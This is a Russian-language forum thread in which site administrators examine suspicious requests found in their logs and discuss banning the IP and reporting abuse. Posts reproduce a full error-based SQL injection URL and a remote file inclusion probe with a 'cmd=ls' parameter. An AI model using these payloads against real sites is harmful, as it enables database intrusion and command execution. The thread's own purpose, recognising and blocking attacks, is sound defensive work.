Попытка инъекции??

Автор kak2z, 01 марта 2014, 13:33:53

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

kak2z

Только что в логах обнаружил ошибки базы данных которые возникли изза такой ссылки

/index.php?page=top5)+AND+(SELECT+8041+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+(CASE+WHEN+(8041%3D8041)+THEN+1+ELSE+0+END)),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+AND+(7609%3D7609

это что?? попытка инъекции??
Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

Serifa

А ссылка как попала?
«- Помощник капитана Бакстер, - заявил Лумис, - безбожно врет. Все отнюдь не под контролем, вернее, не под его контролем. Корабль захвачен представителями небелковой формы разумной жизни, которые маскируются под обслуживающих роботов, а некоторые даже не делают и этого...»
«То, что у тебя есть, лечится антибиотиками» (nowhere man, 1995)
В телеге срочно нужны читатели!

Yworld_garry

Цитата: kak2z от 01 марта 2014, 13:33:53это что?? попытка инъекции??
Такую же хрень наблюдаю в логах одного проекта, причем ИП немецкий, хост хетзнер. Ломится не по детски, нагрузку увеличил в 5 раз. Насколько я понимаю это штука по уязвимости вордпресаа и почему он решил бить по форумам не понятно))) Не только кстати по форумам, нашел еще на одном, ну совсем не форум и далеко не вордпресс. Может и не только у пресса, но я нарыл что этим пресс ломают.
IP вот сюда в бан .htaccess, будет наглеть дальше, абузу в хост, они там быстро реагируют на такое.

Serifa

Нам тоже IP сообщите, на всякий случай.
«- Помощник капитана Бакстер, - заявил Лумис, - безбожно врет. Все отнюдь не под контролем, вернее, не под его контролем. Корабль захвачен представителями небелковой формы разумной жизни, которые маскируются под обслуживающих роботов, а некоторые даже не делают и этого...»
«То, что у тебя есть, лечится антибиотиками» (nowhere man, 1995)
В телеге срочно нужны читатели!

Yworld_garry

Цитата: Serifa от 01 марта 2014, 15:06:27Нам тоже IP сообщите, на всякий случай.
проверьте PM

kak2z

теперь по этой ссылке ломится))

/index.php?page[path]=http://www.google.com/humans.txt?&cmd=ls
Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

Yworld_garry

Цитата: kak2z от 01 марта 2014, 16:36:06теперь по этой ссылке ломится))
Скинь мне в личку ИП

kak2z

Цитата: Yworld_garry от 01 марта 2014, 16:58:35
Скинь мне в личку ИП

уже логи почистил(((
как только будут новые записи - пришлю)
Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

Serifa

Похоже, у меня он тоже побывал:

ЦитироватьГость
Применить фильтр: Показать сообщения об ошибках этого IP адреса *.*.254.19 
     Показать в обратном хронологическом порядке Сегодня в 00:10
Применить фильтр: Показать сообщения об ошибках этой сессии c080a1a02099480b9e1f0ec25d94d5e9
Применить фильтр: Отображать ошибки только этого типа Тип ошибки: Неопределенные
Применить фильтр: Показать сообщения об ошибках этого адреса(URL)
http://forroll.org/index.php?page[path]=http://www.google.com/humans.txt?&cmd=ls
Применить фильтр: Показать ошибки только с теми сообщениями
8: Undefined offset: 1
Применить фильтр: Отображать ошибки только этого файла
Файл: /home/fr/public_html/Sources/Subs-Db-mysql.php
Строка: 103
И еще строка 135.

Айпи у меня на форуме неправильно показываются, надо в Cpanel глянуть.
«- Помощник капитана Бакстер, - заявил Лумис, - безбожно врет. Все отнюдь не под контролем, вернее, не под его контролем. Корабль захвачен представителями небелковой формы разумной жизни, которые маскируются под обслуживающих роботов, а некоторые даже не делают и этого...»
«То, что у тебя есть, лечится антибиотиками» (nowhere man, 1995)
В телеге срочно нужны читатели!